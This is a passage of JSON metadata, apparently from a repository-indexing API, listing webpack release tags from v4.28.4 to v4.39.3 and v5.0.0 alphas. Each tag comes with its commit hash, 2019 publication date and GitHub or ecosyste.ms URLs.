9bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https: